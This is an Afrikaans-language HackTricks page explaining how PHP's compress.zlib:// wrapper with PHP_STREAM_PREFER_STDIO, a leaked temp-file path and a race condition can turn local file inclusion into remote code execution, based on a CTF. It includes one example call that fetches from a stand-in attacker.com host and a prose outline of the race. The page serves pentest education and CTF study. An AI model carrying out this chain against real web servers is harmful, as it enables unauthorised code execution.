hacktricks/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
2024-02-11 02:07:06 +00:00

4.2 KiB

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

compress.zlib:// en PHP_STREAM_PREFER_STDIO

'n Lêer wat geopen word met die protokol compress.zlib:// met die vlag PHP_STREAM_PREFER_STDIO kan voortgaan om data wat later by die verbinding aankom, na dieselfde lêer te skryf.

Dit beteken dat 'n oproep soos:

file_get_contents("compress.zlib://http://attacker.com/file")

Sal stuur 'n versoek om http://attacker.com/file, dan kan die bediener die versoek beantwoord met 'n geldige HTTP-antwoord, die verbinding oop hou en later ekstra data stuur wat ook in die lêer geskryf sal word.

Jy kan daardie inligting sien in hierdie deel van die php-src-kode in main/streams/cast.c:

/* Use a tmpfile and copy the old streams contents into it */

if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}

Race Voorwaarde tot RCE

Hierdie CTF is opgelos deur gebruik te maak van die vorige truuk.

Die aanvaller sal die slagofferbediener dwing om 'n verbinding oop te maak en 'n lêer van die aanvaller se bediener te lees deur gebruik te maak van die compress.zlib protokol.

Terwyl hierdie verbinding bestaan, sal die aanvaller die pad na die tydelike lêer wat geskep is, uitlek (dit word deur die bediener uitgelek).

Terwyl die verbinding nog oop is, sal die aanvaller 'n LFI uitbuit deur die tydelike lêer te laai wat hy beheer.

Daar is egter 'n kontrole in die webbediener wat verhoed dat lêers gelaai word wat <? bevat. Daarom sal die aanvaller 'n Race Voorwaarde misbruik. In die verbinding wat nog oop is, sal die aanvaller die PHP-payload NA die webbediener stuur het gekontroleer of die lêer die verbode karakters bevat, maar VOORDAT dit sy inhoud laai.

Vir meer inligting, kyk na die beskrywing van die Race Voorwaarde en die CTF by https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: